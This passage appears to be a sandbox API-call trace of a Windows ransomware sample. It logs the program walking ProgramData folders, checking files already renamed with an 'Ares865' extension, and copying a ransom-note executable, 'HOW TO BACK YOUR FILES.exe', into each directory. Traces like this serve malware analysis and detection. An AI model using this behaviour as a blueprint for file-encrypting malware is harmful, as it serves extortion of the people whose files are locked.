lpString1=0x2cce48a, lpString2="WWINTL.DLL.trx_dll.Ares865" | out: lpString1="WWINTL.DLL.trx_dll.Ares865") returned="WWINTL.DLL.trx_dll.Ares865" [0090.279] lstrlenW (lpString="WWINTL.DLL.trx_dll.Ares865") returned 26 [0090.279] lstrlenW (lpString="Ares865") returned 7 [0090.279] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.279] lstrcpyW (in: lpString1=0x2cce48a, lpString2="WWINTL.REST.trx_dll.Ares865" | out: lpString1="WWINTL.REST.trx_dll.Ares865") returned="WWINTL.REST.trx_dll.Ares865" [0090.279] lstrlenW (lpString="WWINTL.REST.trx_dll.Ares865") returned 27 [0090.279] lstrlenW (lpString="Ares865") returned 7 [0090.279] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.280] lstrcpyW (in: lpString1=0x2cce48a, lpString2="XLINTL32.DLL.trx_dll.Ares865" | out: lpString1="XLINTL32.DLL.trx_dll.Ares865") returned="XLINTL32.DLL.trx_dll.Ares865" [0090.280] lstrlenW (lpString="XLINTL32.DLL.trx_dll.Ares865") returned 28 [0090.280] lstrlenW (lpString="Ares865") returned 7 [0090.280] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.280] lstrcpyW (in: lpString1=0x2cce48a, lpString2="XLINTL32.REST.trx_dll.Ares865" | out: lpString1="XLINTL32.REST.trx_dll.Ares865") returned="XLINTL32.REST.trx_dll.Ares865" [0090.280] lstrlenW (lpString="XLINTL32.REST.trx_dll.Ares865") returned 29 [0090.280] lstrlenW (lpString="Ares865") returned 7 [0090.280] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.280] lstrcpyW (in: lpString1=0x2cce48a, lpString2="XLSLICER.DLL.trx_dll.Ares865" | out: lpString1="XLSLICER.DLL.trx_dll.Ares865") returned="XLSLICER.DLL.trx_dll.Ares865" [0090.280] lstrlenW (lpString="XLSLICER.DLL.trx_dll.Ares865") returned 28 [0090.280] lstrlenW (lpString="Ares865") returned 7 [0090.280] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.280] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036" [0090.280] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0090.280] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0090.280] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036") returned 68 [0090.280] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036" [0090.280] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.280] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\office\\uicaptions\\1036\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.281] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.281] GetLastError () returned 0x0 [0090.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.281] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.281] CloseHandle (hObject=0x120) returned 1 [0090.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.281] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.281] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x666a0300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x666a0300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.281] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.281] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.282] lstrcpyW (in: lpString1=0x2cce48a, lpString2="ENVELOPR.DLL.trx_dll.Ares865" | out: lpString1="ENVELOPR.DLL.trx_dll.Ares865") returned="ENVELOPR.DLL.trx_dll.Ares865" [0090.282] lstrlenW (lpString="ENVELOPR.DLL.trx_dll.Ares865") returned 28 [0090.282] lstrlenW (lpString="Ares865") returned 7 [0090.282] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.282] lstrcpyW (in: lpString1=0x2cce48a, lpString2="GRINTL32.DLL.trx_dll.Ares865" | out: lpString1="GRINTL32.DLL.trx_dll.Ares865") returned="GRINTL32.DLL.trx_dll.Ares865" [0090.282] lstrlenW (lpString="GRINTL32.DLL.trx_dll.Ares865") returned 28 [0090.282] lstrlenW (lpString="Ares865") returned 7 [0090.282] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.282] lstrcpyW (in: lpString1=0x2cce48a, lpString2="GRINTL32.REST.trx_dll.Ares865" | out: lpString1="GRINTL32.REST.trx_dll.Ares865") returned="GRINTL32.REST.trx_dll.Ares865" [0090.282] lstrlenW (lpString="GRINTL32.REST.trx_dll.Ares865") returned 29 [0090.282] lstrlenW (lpString="Ares865") returned 7 [0090.282] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.282] lstrcpyW (in: lpString1=0x2cce48a, lpString2="MAPIR.DLL.trx_dll.Ares865" | out: lpString1="MAPIR.DLL.trx_dll.Ares865") returned="MAPIR.DLL.trx_dll.Ares865" [0090.282] lstrlenW (lpString="MAPIR.DLL.trx_dll.Ares865") returned 25 [0090.282] lstrlenW (lpString="Ares865") returned 7 [0090.282] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.282] lstrcpyW (in: lpString1=0x2cce48a, lpString2="MOR6INT.REST.trx_dll.Ares865" | out: lpString1="MOR6INT.REST.trx_dll.Ares865") returned="MOR6INT.REST.trx_dll.Ares865" [0090.282] lstrlenW (lpString="MOR6INT.REST.trx_dll.Ares865") returned 28 [0090.282] lstrlenW (lpString="Ares865") returned 7 [0090.282] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.282] lstrcpyW (in: lpString1=0x2cce48a, lpString2="MSOINTL.DLL.trx_dll.Ares865" | out: lpString1="MSOINTL.DLL.trx_dll.Ares865") returned="MSOINTL.DLL.trx_dll.Ares865" [0090.282] lstrlenW (lpString="MSOINTL.DLL.trx_dll.Ares865") returned 27 [0090.283] lstrlenW (lpString="Ares865") returned 7 [0090.283] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.283] lstrcpyW (in: lpString1=0x2cce48a, lpString2="MSOINTL.REST.trx_dll.Ares865" | out: lpString1="MSOINTL.REST.trx_dll.Ares865") returned="MSOINTL.REST.trx_dll.Ares865" [0090.283] lstrlenW (lpString="MSOINTL.REST.trx_dll.Ares865") returned 28 [0090.283] lstrlenW (lpString="Ares865") returned 7 [0090.283] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.283] lstrcpyW (in: lpString1=0x2cce48a, lpString2="OMSINTL.DLL.trx_dll.Ares865" | out: lpString1="OMSINTL.DLL.trx_dll.Ares865") returned="OMSINTL.DLL.trx_dll.Ares865" [0090.283] lstrlenW (lpString="OMSINTL.DLL.trx_dll.Ares865") returned 27 [0090.283] lstrlenW (lpString="Ares865") returned 7 [0090.283] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.283] lstrcpyW (in: lpString1=0x2cce48a, lpString2="ONINTL.DLL.trx_dll.Ares865" | out: lpString1="ONINTL.DLL.trx_dll.Ares865") returned="ONINTL.DLL.trx_dll.Ares865" [0090.283] lstrlenW (lpString="ONINTL.DLL.trx_dll.Ares865") returned 26 [0090.283] lstrlenW (lpString="Ares865") returned 7 [0090.283] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.283] lstrcpyW (in: lpString1=0x2cce48a, lpString2="ONINTL.REST.trx_dll.Ares865" | out: lpString1="ONINTL.REST.trx_dll.Ares865") returned="ONINTL.REST.trx_dll.Ares865" [0090.283] lstrlenW (lpString="ONINTL.REST.trx_dll.Ares865") returned 27 [0090.283] lstrlenW (lpString="Ares865") returned 7 [0090.283] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.283] lstrcpyW (in: lpString1=0x2cce48a, lpString2="OUTLLIBR.DLL.trx_dll.Ares865" | out: lpString1="OUTLLIBR.DLL.trx_dll.Ares865") returned="OUTLLIBR.DLL.trx_dll.Ares865" [0090.283] lstrlenW (lpString="OUTLLIBR.DLL.trx_dll.Ares865") returned 28 [0090.283] lstrlenW (lpString="Ares865") returned 7 [0090.283] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.283] lstrcpyW (in: lpString1=0x2cce48a, lpString2="OUTLLIBR.REST.trx_dll.Ares865" | out: lpString1="OUTLLIBR.REST.trx_dll.Ares865") returned="OUTLLIBR.REST.trx_dll.Ares865" [0090.283] lstrlenW (lpString="OUTLLIBR.REST.trx_dll.Ares865") returned 29 [0090.283] lstrlenW (lpString="Ares865") returned 7 [0090.283] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.284] lstrcpyW (in: lpString1=0x2cce48a, lpString2="OUTLWVW.DLL.trx_dll.Ares865" | out: lpString1="OUTLWVW.DLL.trx_dll.Ares865") returned="OUTLWVW.DLL.trx_dll.Ares865" [0090.284] lstrlenW (lpString="OUTLWVW.DLL.trx_dll.Ares865") returned 27 [0090.284] lstrlenW (lpString="Ares865") returned 7 [0090.284] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.284] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PPINTL.DLL.trx_dll.Ares865" | out: lpString1="PPINTL.DLL.trx_dll.Ares865") returned="PPINTL.DLL.trx_dll.Ares865" [0090.284] lstrlenW (lpString="PPINTL.DLL.trx_dll.Ares865") returned 26 [0090.284] lstrlenW (lpString="Ares865") returned 7 [0090.284] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.284] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PPINTL.REST.trx_dll.Ares865" | out: lpString1="PPINTL.REST.trx_dll.Ares865") returned="PPINTL.REST.trx_dll.Ares865" [0090.284] lstrlenW (lpString="PPINTL.REST.trx_dll.Ares865") returned 27 [0090.284] lstrlenW (lpString="Ares865") returned 7 [0090.284] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.284] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PUB6INTL.DLL.trx_dll.Ares865" | out: lpString1="PUB6INTL.DLL.trx_dll.Ares865") returned="PUB6INTL.DLL.trx_dll.Ares865" [0090.284] lstrlenW (lpString="PUB6INTL.DLL.trx_dll.Ares865") returned 28 [0090.284] lstrlenW (lpString="Ares865") returned 7 [0090.284] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.284] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PUB6INTL.REST.trx_dll.Ares865" | out: lpString1="PUB6INTL.REST.trx_dll.Ares865") returned="PUB6INTL.REST.trx_dll.Ares865" [0090.284] lstrlenW (lpString="PUB6INTL.REST.trx_dll.Ares865") returned 29 [0090.284] lstrlenW (lpString="Ares865") returned 7 [0090.284] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.284] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PUBWZINT.REST.trx_dll.Ares865" | out: lpString1="PUBWZINT.REST.trx_dll.Ares865") returned="PUBWZINT.REST.trx_dll.Ares865" [0090.284] lstrlenW (lpString="PUBWZINT.REST.trx_dll.Ares865") returned 29 [0090.284] lstrlenW (lpString="Ares865") returned 7 [0090.284] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.285] lstrcpyW (in: lpString1=0x2cce48a, lpString2="SGRES.DLL.trx_dll.Ares865" | out: lpString1="SGRES.DLL.trx_dll.Ares865") returned="SGRES.DLL.trx_dll.Ares865" [0090.285] lstrlenW (lpString="SGRES.DLL.trx_dll.Ares865") returned 25 [0090.285] lstrlenW (lpString="Ares865") returned 7 [0090.285] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.285] lstrcpyW (in: lpString1=0x2cce48a, lpString2="STINTL.DLL.trx_dll.Ares865" | out: lpString1="STINTL.DLL.trx_dll.Ares865") returned="STINTL.DLL.trx_dll.Ares865" [0090.285] lstrlenW (lpString="STINTL.DLL.trx_dll.Ares865") returned 26 [0090.285] lstrlenW (lpString="Ares865") returned 7 [0090.285] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.285] lstrcpyW (in: lpString1=0x2cce48a, lpString2="VISBRRES.DLL.trx_dll.Ares865" | out: lpString1="VISBRRES.DLL.trx_dll.Ares865") returned="VISBRRES.DLL.trx_dll.Ares865" [0090.285] lstrlenW (lpString="VISBRRES.DLL.trx_dll.Ares865") returned 28 [0090.285] lstrlenW (lpString="Ares865") returned 7 [0090.285] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.285] lstrcpyW (in: lpString1=0x2cce48a, lpString2="VISINTL.DLL.trx_dll.Ares865" | out: lpString1="VISINTL.DLL.trx_dll.Ares865") returned="VISINTL.DLL.trx_dll.Ares865" [0090.285] lstrlenW (lpString="VISINTL.DLL.trx_dll.Ares865") returned 27 [0090.285] lstrlenW (lpString="Ares865") returned 7 [0090.285] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.285] lstrcpyW (in: lpString1=0x2cce48a, lpString2="WWINTL.DLL.trx_dll.Ares865" | out: lpString1="WWINTL.DLL.trx_dll.Ares865") returned="WWINTL.DLL.trx_dll.Ares865" [0090.285] lstrlenW (lpString="WWINTL.DLL.trx_dll.Ares865") returned 26 [0090.285] lstrlenW (lpString="Ares865") returned 7 [0090.285] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.285] lstrcpyW (in: lpString1=0x2cce48a, lpString2="WWINTL.REST.trx_dll.Ares865" | out: lpString1="WWINTL.REST.trx_dll.Ares865") returned="WWINTL.REST.trx_dll.Ares865" [0090.285] lstrlenW (lpString="WWINTL.REST.trx_dll.Ares865") returned 27 [0090.285] lstrlenW (lpString="Ares865") returned 7 [0090.285] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.286] lstrcpyW (in: lpString1=0x2cce48a, lpString2="XLINTL32.DLL.trx_dll.Ares865" | out: lpString1="XLINTL32.DLL.trx_dll.Ares865") returned="XLINTL32.DLL.trx_dll.Ares865" [0090.286] lstrlenW (lpString="XLINTL32.DLL.trx_dll.Ares865") returned 28 [0090.286] lstrlenW (lpString="Ares865") returned 7 [0090.286] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.286] lstrcpyW (in: lpString1=0x2cce48a, lpString2="XLINTL32.REST.trx_dll.Ares865" | out: lpString1="XLINTL32.REST.trx_dll.Ares865") returned="XLINTL32.REST.trx_dll.Ares865" [0090.286] lstrlenW (lpString="XLINTL32.REST.trx_dll.Ares865") returned 29 [0090.286] lstrlenW (lpString="Ares865") returned 7 [0090.286] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.286] lstrcpyW (in: lpString1=0x2cce48a, lpString2="XLSLICER.DLL.trx_dll.Ares865" | out: lpString1="XLSLICER.DLL.trx_dll.Ares865") returned="XLSLICER.DLL.trx_dll.Ares865" [0090.286] lstrlenW (lpString="XLSLICER.DLL.trx_dll.Ares865") returned 28 [0090.286] lstrlenW (lpString="Ares865") returned 7 [0090.286] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.286] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Network", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Network") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Network" [0090.286] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0090.286] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0090.286] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Network") returned 53 [0090.286] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Network" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Network") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Network" [0090.286] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.286] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\network\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.287] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.287] GetLastError () returned 0x0 [0090.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.287] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.287] CloseHandle (hObject=0x120) returned 1 [0090.287] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.287] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.287] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.287] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.287] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.287] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Connections" | out: lpString1="Connections") returned="Connections" [0090.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0090.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e95b0 [0090.289] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0090.289] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Downloader" | out: lpString1="Downloader") returned="Downloader" [0090.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0090.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x82) returned 0x2e9eb0 [0090.289] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0090.289] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Downloader", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Downloader") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Downloader" [0090.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0090.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0090.290] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Downloader") returned 64 [0090.290] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Downloader" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Downloader") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Downloader" [0090.290] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.290] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Downloader\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\network\\downloader\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.290] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.290] GetLastError () returned 0x0 [0090.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.290] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.291] CloseHandle (hObject=0x120) returned 1 [0090.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.291] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.291] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6681d0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6681d0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.291] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.291] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.291] lstrcpyW (in: lpString1=0x2cce482, lpString2="qmgr0.dat.Ares865" | out: lpString1="qmgr0.dat.Ares865") returned="qmgr0.dat.Ares865" [0090.291] lstrlenW (lpString="qmgr0.dat.Ares865") returned 17 [0090.291] lstrlenW (lpString="Ares865") returned 7 [0090.291] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.291] lstrcpyW (in: lpString1=0x2cce482, lpString2="qmgr1.dat.Ares865" | out: lpString1="qmgr1.dat.Ares865") returned="qmgr1.dat.Ares865" [0090.291] lstrlenW (lpString="qmgr1.dat.Ares865") returned 17 [0090.291] lstrlenW (lpString="Ares865") returned 7 [0090.291] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.291] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Connections", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Connections") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Connections" [0090.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0090.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0090.291] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Connections") returned 65 [0090.291] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Connections" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Connections") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Connections" [0090.291] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.292] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Connections\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\network\\connections\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.292] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.292] GetLastError () returned 0x0 [0090.292] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.292] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.292] CloseHandle (hObject=0x120) returned 1 [0090.292] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.293] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.293] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.293] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR 